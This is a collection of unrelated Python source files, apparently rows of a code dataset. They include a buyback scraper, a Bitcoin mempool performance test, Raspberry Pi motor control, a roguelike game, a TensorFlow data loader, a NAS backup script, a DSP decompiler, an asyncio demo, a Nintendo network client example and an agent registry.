#Scrape the relevant info for an individual announcement
for numb in ["1","2","3","4","5","6"]:
string = ".tblContent" + numb
count = count + 1
start = int(str(item.select(string)).find('">') + 2)
stop = int(str(item.select(string)).find('</'))
extract = str(item.select(string))[start:stop]
if count == 1:
date = extract
y = int(date[date.rfind("/")+1:len(date)])+2000
try:
d = int(date[date.find("/")+1:len(date)-date.find("/")-2])
except ValueError:
d = 1
m = int(date[0:date.find("/")])
date = datetime.datetime(y,m,d).strftime("%Y-%m-%d")
if count == 2:
ticker = extract[extract.find(">")+1:len(extract)]
if ticker.find(",") > 0:
while ticker.count(",") > 1: # strip until unly one comma left
ticker = ticker[ticker.find(",")+1:len(ticker)] # Strip before first comma
ticker = ticker[0:ticker.find(",")] # Strip after second comma
if ticker.find(".") > 0:
ticker = ticker[0:ticker.find(".")]
ticker = filter(str.isupper, ticker)
if count == 4:
buyback = extract
unit = buyback.join(re.findall("[a-zA-Z]+", buyback))
val = re.findall(r"[-+]?\d*\.\d+|\d+", buyback)
val = float(val[0])
if unit == "":
val = val / 1000000
elif unit == "K":
val = val / 1000
elif unit == "Bln":
val = val * 1000
date_list.append(date)
stock_list.append(ticker)
bb_list.append(val)
#Build the aggregated list and removing buybacks
#already in the existing buyback database
teststr = str(date)+','+str(ticker)+','+str(val)
if teststr in existing_database:
date_list.pop()
stock_list.pop()
bb_list.pop()
not_added = not_added + 1
#Make a master list
master = [date_list, stock_list, bb_list]
with open('scrape_database.csv', 'ab') as scrapefile:
file_writer = csv.writer(scrapefile)
for i in range(len(master[0])):
file_writer.writerow([x[i] for x in master])
sort_existing_scrapefile()
print '\n', '---------------------------------------------------------'
print 'MODULE: NEW SHARE BUYBACKS FROM STOCKMAVEN.COM.'
print 'Output: ' + str(len(date_list)) + \
' buyback(s) added to scrape_database.csv.'
print ' ' + str(not_added) + ' buyback(s) scraped but not added to database'
print 'Run-time:', "%.2f" %(time.time() - start_time), 'sec'
print '---------------------------------------------------------' + '\n'
#Read the existing scrapefile into a list for comparison
def read_existing_scrapefile():
'''
(file open for reading) -> list of str
Read and return each row in the scrapefile
comprising date, ticker, and amount of a buyback and return
a list of strings containing this information
Precondition: the file scrapefile.csv must be available in
the root directory
'''
scrape_database = open('scrape_database.csv','r')
line = scrape_database.readline().strip('\n')
existing_database = []
while line !='':
existing_database.append(str(line))
line = scrape_database.readline().strip('\n')
scrape_database.close()
return existing_database
# Sort the existing scrapefile by descending dates
def sort_existing_scrapefile():
'''
Version update: MSP @ 00:12 29.04.14
( ) -> ( )
Sort the buyback database (scrape_database.csv) by descending dates.
'''
c = bb_l.load_buyback_df(-1,-1).T.sort('Date',ascending=False)
d = c.index.tolist()
c['Ticker'] = d
e = c['Date'].tolist()
f = c[['Ticker','Amount']]
f.index = e
f.to_csv('scrape_database.csv', header=False)
|
9,225 | 661eef8500309191514fd760b7518014dee2bb5f | #!/usr/bin/env python3
# Copyright (c) 2018 Nobody
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test perforance of descendant package (chained transactions)"""
import time
import copy
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import COIN
from test_framework.blocktools import *
"""Read optional arguments from command line"""
CHAINED_TX = 25
if len(sys.argv)>1:
CHAINED_TX = int(sys.argv[1])
TEST_ITERATIONS = 1
if len(sys.argv)>2:
TEST_ITERATIONS = int(sys.argv[2])
DEBUG_MODE = '-printtoconsole'
MAX_ANCESTORS = CHAINED_TX
MAX_DESCENDANTS = CHAINED_TX
MAGNETIC_ANOMALY_START_TIME = 2000000000
class ChainedTest(BitcoinTestFramework):
def set_test_params(self):
''' our test network requires a peer node so that getblocktemplate succeeds '''
self.num_nodes = 2
chained_args = ["-limitancestorcount=2000", "-limitdescendantcount=2000",
"-limitancestorsize=1000", "-limitdescendantsize=1000",
"-magneticanomalyactivationtime=%d" % MAGNETIC_ANOMALY_START_TIME
]
config_node2 = chained_args.copy()
if DEBUG_MODE:
chained_args.append(DEBUG_MODE)
self.extra_args = [chained_args, config_node2]
# Build a transaction that spends parent_txid:vout
# Return amount sent
def chain_transaction(self, node, parent_txid, vout, value, fee, num_outputs):
send_value = satoshi_round((value - fee) / num_outputs)
inputs = [{'txid': parent_txid, 'vout': vout}]
outputs = {}
for i in range(num_outputs):
outputs[node.getnewaddress()] = send_value
rawtx = node.createrawtransaction(inputs, outputs)
signedtx = node.signrawtransaction(rawtx)
#measure the performance of sending the raw transaction to the node
sendtx_start = time.perf_counter()
new_txid = node.sendrawtransaction(signedtx['hex'])
sendtx_stop = time.perf_counter()
fulltx = node.getrawtransaction(new_txid, 1)
#self.log.info('{0} => {1}'.format(parent_txid, fulltx['vout'][0]))
# make sure we didn't generate a change output
assert(len(fulltx['vout']) == num_outputs)
return (new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size'])
def mine_blocks(self):
''' Mine some blocks and have them mature. '''
self.nodes[0].generate(101)
self.utxo = self.nodes[0].listunspent(10)
self.txid = self.utxo[0]['txid']
self.coinbasetx = self.txid
self.vout = self.utxo[0]['vout']
self.value = self.utxo[0]['amount']
self.fee = Decimal("0.0001")
self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
self.block_time = int(time.time()) + 1
def send_chain_to_node(self):
''' Generates tx chain and send it to node '''
for i in range(CHAINED_TX):
(sent_txid, sent_value, this_sendtx, tx_size) = self.chain_transaction(
self.nodes[0], self.txid, 0, self.value, self.fee, 1)
if not self.chain_top:
self.chain_top = sent_txid
self.txid = sent_txid
self.value = sent_value
self.chain.append(sent_txid)
self.mempool_send += this_sendtx
self.mempool_size += tx_size
def create_new_block(self):
''' Create a new block with an anyone-can-spend coinbase '''
block = create_block(
self.tip, create_coinbase(self.height), self.block_time)
self.block_time += 1
block.solve()
return block
def mempool_count(self):
''' get count of tx in mempool '''
mininginfo = self.nodes[0].getmininginfo()
return mininginfo['pooledtx']
def dumppool(self, mempool):
''' Show list of chained tx in mempool with parent(depends) '''
def sortdepends(e):
return e['descendantcount']
sortedlist = [[k,v] for k,v in mempool.items()]
sortedlist = sorted(sortedlist, key=lambda l: l[1]['descendantcount'], reverse=True)
for memkv in sortedlist:
memtx = memkv[1]
self.log.info('{} {} {}'.format(memkv[0], memtx['descendantcount'], memtx['depends']))
def run_test(self):
self.log.info('Starting Test with {0} Chained Transactions'.format(CHAINED_TX))
self.chain_top = None
self.mine_blocks()
self.mempool_send = 0
self.mempool_size = 0
self.chain = []
self.send_chain_to_node()
# mempool should have all our tx
assert(self.mempool_count() == CHAINED_TX)
mempool = self.nodes[0].getrawmempool(True)
self.log.info('tx at top has {} descendants'.format(mempool[self.chain_top]["descendantcount"]))
assert(mempool[self.chain_top]["descendantcount"] == CHAINED_TX)
#self.dumppool(mempool)
self.height = 1
# create new block and save coinbase
self.block1 = self.create_new_block()
self.tip = self.block1.sha256
self.height += 1
#mature the block so we can spend the coinbase
for i in range(100):
block = self.create_new_block()
self.tip = block.sha256
self.height += 1
#sync pool not needed as long as we are using node 0 which has all the tx we sent to it
#sync_mempools(self.nodes, wait=1, timeout=100)
self.runs=[]
for test_iteration in range(TEST_ITERATIONS):
# do not use perf_counter. use timer from -printtoconsole instead
gbt_start = time.perf_counter()
# assemble a block and validate all tx in it
templat = self.nodes[0].getblocktemplate()
gbt_stop = time.perf_counter()
# make sure all tx got mined
assert(len(templat['transactions']) == CHAINED_TX)
self.runs.append(gbt_stop - gbt_start)
#assert(self.mempool_count() == 0)
self.log.info('Mempool size {0}'.format(self.mempool_size))
self.log.info('Send Tx took {0:.5f}s'.format(self.mempool_send))
if len(self.runs) > 1:
self.log.info('run times {}'.format(self.runs))
self.log.info('GetBlkT took {0:.5f}s'.format(sum(self.runs)/len(self.runs)))
if __name__ == '__main__':
ChainedTest().main()
|
9,226 | a7cbd595b86908fb399bf11e1522588e0b0475c3 | from time import sleep
import RPi.GPIO as gpio
#GPIO.setmode(GPIO.BCM)
gpio.setwarnings(False)
def init():
gpio.setmode(gpio.BCM)
gpio.setup(26, gpio.OUT)
gpio.setup(19, gpio.OUT)
gpio.setup(13, gpio.OUT)
gpio.setup(6, gpio.OUT)
def turn_left(tf):
gpio.output(26, False)
gpio.output(19, True)
gpio.output(13, False)
gpio.output(6, True)
sleep(tf)
def turn_right(tf):
gpio.output(26, True)
gpio.output(19, False)
gpio.output(13, True)
gpio.output(6, False)
sleep(tf)
def forward(tf):
gpio.output(26, True)
gpio.output(19, False)
gpio.output(13, False)
gpio.output(6, True)
sleep(tf)
def reverse(tf):
gpio.output(26, False)
gpio.output(19, True)
gpio.output(13, True)
gpio.output(6, False)
sleep(tf)
def stop(tf):
gpio.output(26, False)
gpio.output(19, False)
gpio.output(13, False)
gpio.output(6, False)
sleep(tf)
gpio.cleanup()
def drive(direction, tym):
init()
if direction == "forward":
forward(tym)
stop(tym)
elif direction == "reverse":
reverse(tym)
stop(tym)
elif direction == "left":
turn_left(tym)
stop(tym)
elif direction == "right":
turn_right(tym)
stop(tym)
elif direction == "stop":
stop(tym)
else :
stop(tym)
if __name__ == '__main__':
import sys
drive((sys.argv[1]), float(sys.argv[2]))
gpio.cleanup()
##
##init()
##forward(0.6)
##sleep(1)
##reverse(0.6)
##sleep(1)
##turn_right(0.6)
##sleep(1)
##turn_left(0.6)
##stop(1)
|
9,227 | 5f089c3e67452fe6d14f96a70d792bc0d056b375 | from . import utils
from . import objects
START = (0, 0)
STARTING_LIFE = 10
WHITE = (255, 255, 255)
class RoughLightGame:
def __init__(self, game_map, width, height, **kwargs):
self.map = game_map
self.width = width
self.height = height
self.objects = kwargs.get('objects', list())
self.start = kwargs.get('start', utils.Vector(0, 0))
# player initialization
self.player = kwargs.get('player', None)
if not self.player:
self.player = objects.Player(self.start, b'@', WHITE,
self.map, STARTING_LIFE, fov=20)
self.objects.append(self.player)
# Add room lables to map
count = 0
for room in self.map.rooms:
label = objects.Object(room.get_center(), chr(ord('a')+count), WHITE, True, False)
self.objects.append(label)
count += 1
def is_blocked(self, location):
if self.map[location].blocks:
return True
return any(object.location == location and object.blocks for object in self.objects)
def visible_objects(self):
res = []
for object in self.objects:
if object.visible and object.location in self.player.seen:
if self.map.in_area(self.width, self.height, object.location, self.player.location):
res.append(object)
return reversed(res)
def move_player(self, direction):
if not self.is_blocked(self.player.location + direction):
self.player.move(direction)
def is_blocked(self, location):
if self.map[location].blocks:
return True
return any(object.blocks and object.location == location for object in self.objects)
def get_area(self, width, height):
# Get the current area the player is in based on desired size and players location
return self.map.get_area(width, height, self.player.location)
|
9,228 | f94fcf6ed54f247093050216c0c331ce188da919 | import tensorflow as tf
import tensorflow_io as tfio
import h5py
class GeneratorVGGNet():
def __call__(self, filename, is_test):
with h5py.File(filename, 'r') as hf:
keys = list(hf.keys())
for key in keys:
if not is_test:
for f, g, z in zip(hf[str(key) + "/left-eye"], hf[str(key) + "/head"], hf[str(key) + "/gaze"]) :
yield (f, g, z)
else:
for f, g in zip(hf[str(key) + "/left-eye"], hf[str(key) + "/head"]) :
yield (f, g)
class Dataset():
def __init__(self, config, path, batch_size, shuffle, is_training, is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
# if (self.config['model'] == 'vggnet'):
# if is_training or is_testing:
# self.data = tf.data.Dataset.from_generator(
# GeneratorVGGNet(),
# output_types = (tf.uint8, tf.float32, tf.float32),
# output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2]), tf.TensorShape([2])),
# args=(self.path, False)
# )
# else:
# self.data = tf.data.Dataset.from_generator(
# GeneratorVGGNet(),
# output_types = (tf.uint8, tf.float32),
# output_shapes = (tf.TensorShape([60,90,3]), tf.TensorShape([2])),
# args=(self.path, True)
# )
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) + '/gaze', spec=tf.float64)
# for key in keys[1:]:
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/left-eye', spec=tf.uint8)
# self.left_eye = self.left_eye.concatenate(temp)
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/head', spec=tf.float64)
# self.head = self.head.concatenate(temp)
# if is_training or is_testing:
# temp = tfio.IODataset.from_hdf5(self.path, '/' + str(key) + '/gaze', spec=tf.float64)
# self.gaze = self.gaze.concatenate(temp)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
def get_data(self):
""" Method used to generate and preprocess tensorflow datasets for training and test data and validation data"""
if self.config['model'] == 'vggnet':
if self.is_training:
return self.data.shuffle(self.shuffle).batch(self.batch_size)
elif self.is_testing:
return self.data.batch(self.batch_size)
elif not self.is_testing and not self.is_training:
return self.data.batch(self.batch_size)
else:
raise NotImplementedError('In dataset.py: default input not specified for this model!')
|
9,229 | b6dd04219de1d4526d175254da539107362772d6 | #!/usr/bin/python
import os
def main():
os.system("notify-send 'Backup' 'NAS Backup Starting...' -i /usr/share/pixmaps/xarchiver/xarchiver-extract.png ")
os.system("sudo mount -o username='emre' //192.168.1.2/Samba /media/NAS")
os.system("sudo rsync -av --include='.profile' --include='.bash*' --exclude='.*' --exclude='VirtualBox*' --exclude='BurpSuite*' --delete /home/monster /media/NAS")
os.system("sudo umount /media/NAS")
os.system("python /home/monster/Scripts/emre-mailclient-weeklybackup.py")
os.system("notify-send 'Backup' 'NAS Backup Completed!' -i /usr/share/pixmaps/xarchiver/xarchiver-add.png & paplay /usr/share/sounds/KDE-Im-User-Auth.ogg")
main()
|
9,230 | fcb1285648f6728e3dad31ad4b602fa4e5c5b422 | from datetime import datetime
from app.commands import backfill_performance_platform_totals, backfill_processing_time
# This test assumes the local timezone is EST
def test_backfill_processing_time_works_for_correct_dates(mocker, notify_api):
send_mock = mocker.patch("app.commands.send_processing_time_for_start_and_end")
# backfill_processing_time is a click.Command object - if you try invoking the callback on its own, it
# throws a `RuntimeError: There is no active click context.` - so get at the original function using __wrapped__
backfill_processing_time.callback.__wrapped__(datetime(2017, 8, 1), datetime(2017, 8, 3))
assert send_mock.call_count == 3
send_mock.assert_any_call(datetime(2017, 8, 3, 4, 0), datetime(2017, 8, 4, 4, 0))
send_mock.assert_any_call(datetime(2017, 8, 3, 4, 0), datetime(2017, 8, 4, 4, 0))
send_mock.assert_any_call(datetime(2017, 8, 3, 4, 0), datetime(2017, 8, 4, 4, 0))
def test_backfill_totals_works_for_correct_dates(mocker, notify_api):
send_mock = mocker.patch("app.commands.send_total_sent_notifications_to_performance_platform")
# backfill_processing_time is a click.Command object - if you try invoking the callback on its own, it
# throws a `RuntimeError: There is no active click context.` - so get at the original function using __wrapped__
backfill_performance_platform_totals.callback.__wrapped__(datetime(2017, 8, 1), datetime(2017, 8, 3))
assert send_mock.call_count == 3
send_mock.assert_any_call(datetime(2017, 8, 1))
send_mock.assert_any_call(datetime(2017, 8, 2))
send_mock.assert_any_call(datetime(2017, 8, 3))
|
9,231 | 865d7c606b287dbce158f721c6cf768cd078eb48 | import collections
import inspect
import struct
from pygments.token import *
import decompil.builder
import decompil.disassemblers
import decompil.ir
class Context(decompil.ir.Context):
def __init__(self):
super(Context, self).__init__(16)
self.pointer_type = self.create_pointer_type(self.half_type)
self.init_registers()
def init_registers(self):
self.registers = regs = [
# 0x00-0x03
Register(self, 'ar0', 16),
Register(self, 'ar1', 16),
Register(self, 'ar2', 16),
Register(self, 'ar3', 16),
# 0x04-0x07
Register(self, 'ix0', 16),
Register(self, 'ix1', 16),
Register(self, 'ix2', 16),
Register(self, 'ix3', 16),
# 0x08-0xb
Register(self, 'r08', 16),
Register(self, 'r09', 16),
Register(self, 'r0a', 16),
Register(self, 'r0b', 16),
# 0x0c-0x0f
# TODO: something special?
Register(self, 'st0', 16),
Register(self, 'st1', 16),
Register(self, 'st2', 16),
Register(self, 'st3', 16),
# 0x10-0x11
# TODO: handle 8-bit overflow
Register(self, 'ac0.h', 16),
Register(self, 'ac1.h', 16),
# 0x12-0x13
Register(self, 'config', 16),
Register(self, 'sr', 16),
# 0x14-0x17
Register(self, 'prod.l', 16),
Register(self, 'prod.m1', 16),
# TODO: handle 8-bit overflow
Register(self, 'prod.h', 16),
Register(self, 'prod.m2', 16),
# 0x18-0x1b
Register(self, 'ax0.l', 16),
Register(self, 'ax1.l', 16),
Register(self, 'ax0.h', 16),
Register(self, 'ax1.h', 16),
# 0x1c-0x1f
Register(self, 'ac0.l', 16),
Register(self, 'ac1.l', 16),
Register(self, 'ac0.m', 16),
Register(self, 'ac1.m', 16),
]
self.wr_registers = [
Register(self, 'wr{}'.format(i), 16) for i in range(4)
]
self.addr_to_wr = {
self.registers[0x00]: self.wr_registers[0x00],
self.registers[0x01]: self.wr_registers[0x01],
self.registers[0x02]: self.wr_registers[0x02],
self.registers[0x03]: self.wr_registers[0x03],
}
self.addr_to_ix = {
self.registers[0x00]: self.registers[0x04],
self.registers[0x01]: self.registers[0x05],
self.registers[0x02]: self.registers[0x06],
self.registers[0x03]: self.registers[0x07],
}
self.long_accumulators = [
Register(self, 'ac0', 40, [
(regs[0x10], 32), (regs[0x1e], 16), (regs[0x1c], 0)
]),
Register(self, 'ac1', 40, [
(regs[0x11], 32), (regs[0x1f], 16), (regs[0x1d], 0)
]),
]
self.short_accumulators = [
Register(self, 'acs0', 24, [(regs[0x10], 16), (regs[0x1e], 0)]),
Register(self, 'acs1', 24, [(regs[0x11], 16), (regs[0x1f], 0)]),
]
self.extra_acculumators = [
Register(self, 'ax0', 32, [(regs[0x1a], 16), (regs[0x18], 0)]),
Register(self, 'ax1', 32, [(regs[0x1b], 16), (regs[0x19], 0)]),
]
self.prod_register = Register(self, 'prod', 40, [
(regs[0x17], 16),
(regs[0x16], 32),
(regs[0x15], 16),
(regs[0x14], 0),
])
class Register(decompil.ir.Register):
def __init__(self, context, name, width, components=None):
self.context = context
self.type = context.create_int_type(width)
self.name = name
self.components = components
self.registers = (
[reg for reg, _ in components]
if components else
None
)
def build_load(self, builder):
if self.components is None:
return builder.build_rload(self)
else:
result = None
for reg, shift in self.components:
val = builder.build_zext(
self.type, builder.build_rload(reg)
)
if shift:
val = builder.build_lshl(val, self.type.create(shift))
if result:
result = builder.build_add(result, val)
else:
result = val
return result
def build_store(self, builder, value):
assert value.type == self.type
if self.components is None:
builder.build_rstore(self, value)
else:
for reg, shift in self.components:
if shift:
val = builder.build_lshl(value, value.type.create(shift))
val = builder.build_trunc(reg.type, val)
builder.build_rstore(reg, val)
def build_load_comp(self, builder):
return [
builder.build_rload(reg)
for reg, _ in self.components
]
def build_store_comp(self, builder, *values):
assert len(values) == len(self.components)
for value, (reg, _) in zip(values, self.components):
builder.build_rstore(reg, value)
def format(self):
return [(Name.Variable, '${}'.format(self.name))]
class BaseDecoder:
name = None
opcode = None
opcode_mask = None
operands_format = None
def decode(self, context, disassembler, builder):
raise NotImplementedError()
def decode_operands(self, context):
return [op.extract(context, self) for op in self.operands_format]
class Instruction(BaseDecoder):
have_extra_operand = False
is_extended = False
def __init__(self, address, opcode, extra_operand=None, extension=None):
self.address = address
self.opcode_value = opcode
self.extension = extension
assert self.is_extended == (extension is not None)
assert self.have_extra_operand == (extra_operand is not None)
self.extra_operand = extra_operand
if self.extension:
self.extension.instruction = self
def __repr__(self):
ext = (
' ({})'.format(self.extension.name)
if self.extension else
''
)
return '{:04x}: {}{}'.format(
self.address, self.name, ext
)
class InstructionExtension(BaseDecoder):
def __init__(self, opcode):
self.opcode_value = opcode
# When accepting an extension, instructions should set the following
# field:
self.instruction = None
def __repr__(self):
return '{:04x}: {} (extension)'.format(
self.address, self.name
)
instructions = []
instruction_extensions = []
def _init_tables():
import gcdsp.decoders
def helper(table, cls):
for obj_name in dir(gcdsp.decoders):
obj = getattr(gcdsp.decoders, obj_name)
if not (
inspect.isclass(obj)
and issubclass(obj, cls)
and obj != cls
):
continue
assert (obj.opcode & ~obj.opcode_mask) == 0
table.append(obj)
helper(instructions, Instruction)
helper(instruction_extensions, InstructionExtension)
_init_tables()
def load_insns():
import gcdsp.decoders
def default_decoder(self, context, disassembler, builder):
builder.build_undef()
disassembler.stop_basic_block()
def decode_operands(self, context):
result = []
for _, size, addend, rshift, mask in self.operands_format:
operand = (self.opcode & mask) >> rshift
result.append(self.opcode & mask + addend)
return result
Insn = collections.namedtuple(
'Insn', 'name opcode mask size unused0 operands is_extended unused1'
)
for insn in gcdsp.decoders.opcodes:
insn = Insn(*insn)
insn_decoder = getattr(
gcdsp.decoders,
'decode_{}'.format(insn.name.lower()),
default_decoder,
)
instructions.append(
type(insn.name, (Instruction, ), {
'name': insn.name,
'opcode': insn.opcode,
'opcode_mask': insn.mask,
'have_extra_operand': insn.size == 2,
'is_extended': insn.is_extended,
'decode': insn_decoder,
'decode_operands': decode_operands,
'operands_format': insn.operands
})
)
for ext in gcdsp.decoders.opcodes_ext:
ext = Insn(*ext)
instruction_extensions.append(
type(ext.name, (InstructionExtension, ), {
'name': ext.name,
'opcode': ext.opcode,
'opcode_mask': ext.mask,
'decode': insn_decoder,
'decode_operands': decode_operands,
'operands_format': insn.operands
})
)
load_insns()
class Decoder(decompil.disassemblers.BaseDecoder):
def __init__(self, fp):
self.fp = fp
def parse_insn(self, disassembler, builder, address):
opcode = self.get_word(address)
next_address = address + 1
if opcode is None:
return None
insn_pat = self.lookup(opcode, instructions)
# Parse the extra operand, if any.
if insn_pat.have_extra_operand:
extra_operand = self.get_word(address + 1)
next_address += 1
if extra_operand is None:
raise ValueError('Incomplete file')
else:
extra_operand = None
# Parse the instruction extension, if any.
if insn_pat.is_extended:
ext_pat = self.lookup(opcode, instruction_extensions)
ext = ext_pat(opcode)
else:
ext = None
insn = insn_pat(address, opcode, extra_operand, ext)
insn_image = '{}{}'.format(
insn.name,
"'{}".format(insn.extension.name) if insn.is_extended else ''
)
builder.set_origin('At {:#04x}: {}'.format(address, insn_image))
# Always decode the extension first (if any).
if insn.is_extended:
insn.extension.decode(disassembler.context, disassembler, builder)
# TODO: remove this once all extensions are supported.
if disassembler.must_stop_basic_block:
return next_address
insn.decode(disassembler.context, disassembler, builder)
return next_address
def iter_insns(self, address):
while True:
address, insn = self.parse_insn(address)
if insn is None:
break
else:
yield address, insn
def get_word(self, address):
self.fp.seek(2 * address)
word = self.fp.read(2)
if len(word) == 0:
return None
elif len(word) == 2:
return struct.unpack('>H', word)[0]
else:
raise ValueError('Incomplete file')
def lookup(self, opcode, pattern_set):
for pat in pattern_set:
if opcode & pat.opcode_mask == pat.opcode:
return pat
else:
raise ValueError('Invalid opcode: {:04x}'.format(opcode))
|
9,232 | e838a52fecbf69719acc6de38b5f045e792e1408 | print("Hi Tom") |
9,233 | e1172e2d9f20e56241829b3e4ccb4bcf6b5440be | #!usr/bin/python
# -*- coding:utf8 -*-
import time
import random
import asyncio
async def consumer(queue, name):
while True:
val = await queue.get()
print(f'{name} get a val: {val} at {time.strftime("%X")}')
await asyncio.sleep(1)
async def producer(queue, name):
for i in range(20):
await queue.put(i)
print(f'{name} put a val: {i}')
await asyncio.sleep(0.1)
async def main():
queue = asyncio.Queue()
tasks = [asyncio.create_task(producer(queue, 'producer'))]
for i in range(3):
tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
# await asyncio.sleep(10)
await asyncio.gather(*tasks, return_exceptions=True)
# start = time.perf_counter()
asyncio.run(main())
# end = time.perf_counter()
# print(end - start)
|
9,234 | 43315abf9e096cdca89ed7f4de976d2706ff9c20 |
from nintendo.nex import backend, authentication, friends, matchmaking, common
from nintendo.account import AccountAPI
from nintendo.games import MK8, Friends
import struct
import logging
logging.basicConfig(level=logging.INFO)
#Device id can be retrieved with a call to MCP_GetDeviceId on the Wii U
#Serial number can be found on the back of the Wii U
DEVICE_ID = 12345678
SERIAL_NUMBER = "..."
SYSTEM_VERSION = 0x220
REGION = 4 #EUR
COUNTRY = "NL"
USERNAME = "..." #Nintendo network id
PASSWORD = "..." #Nintendo network password
#This function logs in on a game server
def backend_login(title, use_auth_info, use_login_data, settings=None):
api.set_title(title.TITLE_ID_EUR, title.LATEST_VERSION)
nex_token = api.get_nex_token(title.GAME_SERVER_ID)
auth_info = None
login_data = None
if use_auth_info:
auth_info = authentication.AuthenticationInfo()
auth_info.token = nex_token.token
auth_info.server_version = title.SERVER_VERSION
if use_login_data:
login_data = authentication.NintendoLoginData()
login_data.token = nex_token.token
client = backend.BackEndClient(settings)
clietn.configure(title.ACCESS_KEY, title.NEX_VERSION)
client.connect(nex_token.host, nex_token.port)
client.login(
nex_token.username, nex_token.password, auth_info, login_data
)
return client
api = AccountAPI()
api.set_device(DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY)
api.login(USERNAME, PASSWORD)
#Connect to both the Mario Kart 8 server and the Wii U friends server
friends_backend = backend_login(
Friends, False, True, "friends.cfg"
)
game_backend = backend_login(MK8, True, False)
pid = game_backend.get_pid()
friends_client = friends.FriendsClient(friends_backend.secure_client)
matchmaker = matchmaking.MatchmakeExtensionClient(game_backend.secure_client)
#Create a matchmake session
matchmake_session = matchmaking.MatchmakeSession()
matchmake_session.player_min = 2
matchmake_session.player_max = 12
matchmake_session.participation_policy = 98
matchmake_session.game_mode = 3
matchmake_session.attribs[4] = 0x403 #DLCs enabled
matchmake_session.matchmake_system = matchmaking.MatchmakeSystem.FRIENDS
session_id = matchmaker.create_matchmake_session(
matchmake_session, "", 1
).gid
#Tell friends we're playing MK8 and have created a room
application_data = b"\0\0\x20\x03\0\0\0\0\0\0\0\0\x18" + struct.pack("<I", pid) + b"\0\0\0"
presence = friends.NintendoPresenceV2()
presence.flags = 0x1EE
presence.is_online = True
presence.game_key.title_id = MK8.TITLE_ID_EUR
presence.game_key.title_version = MK8.LATEST_VERSION
presence.message = "I'm a Python client"
presence.unk2 = 2
presence.unk3 = 2
presence.game_server_id = MK8.GAME_SERVER_ID
presence.unk4 = 3
presence.pid = pid
presence.gathering_id = session_id
presence.application_data = application_data
friends_client.update_presence(presence)
input("Press enter to disconnect and exit\n")
#Tell friends we've gone offline
presence = friends.NintendoPresenceV2()
friends_client.update_presence(presence)
#Disconnect from servers
game_backend.close()
friends_backend.close()
|
9,235 | b77c40c89c88b49c851e9a14c67cf0799d6de847 | # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from smarts.core.utils.class_factory import ClassRegister
agent_registry = ClassRegister()
def register(locator: str, entry_point, **kwargs):
"""Register an AgentSpec with the zoo.
In order to load a registered AgentSpec it needs to be reachable from a
directory contained in the PYTHONPATH.
Args:
locator:
A string in the format of 'locator-name'
entry_point:
A callable that returns an AgentSpec or an AgentSpec object
For example:
.. code-block:: python
register(
locator="motion-planner-agent-v0",
entry_point=lambda **kwargs: AgentSpec(
interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),
agent_builder=MotionPlannerAgent,
),
)
"""
agent_registry.register(name=locator, entry_point=entry_point, **kwargs)
def make(locator: str, **kwargs):
"""Create an AgentSpec from the given locator.
In order to load a registered AgentSpec it needs to be reachable from a
directory contained in the PYTHONPATH.
Args:
locator:
A string in the format of 'path.to.file:locator-name' where the path
is in the form `{PYTHONPATH}[n]/path/to/file.py`
kwargs:
Additional arguments to be passed to the constructed class.
Returns:
AgentSpec: The agent specifications needed to instantiate and configure an agent.
"""
from smarts.zoo.agent_spec import AgentSpec
agent_spec = agent_registry.make(locator, **kwargs)
assert isinstance(
agent_spec, AgentSpec
), f"Expected make to produce an instance of AgentSpec, got: {agent_spec}"
return agent_spec
def make_agent(locator: str, **kwargs):
"""Create an Agent from the given agent spec locator.
In order to load a registered AgentSpec it needs to be reachable from a
directory contained in the PYTHONPATH.
Args:
locator:
A string in the format of 'path.to.file:locator-name' where the path
is in the form `{PYTHONPATH}[n]/path/to/file.py`
kwargs:
Additional arguments to be passed to the constructed class.
Returns:
Tuple[Agent, AgentInterface]: The agent and its interface.
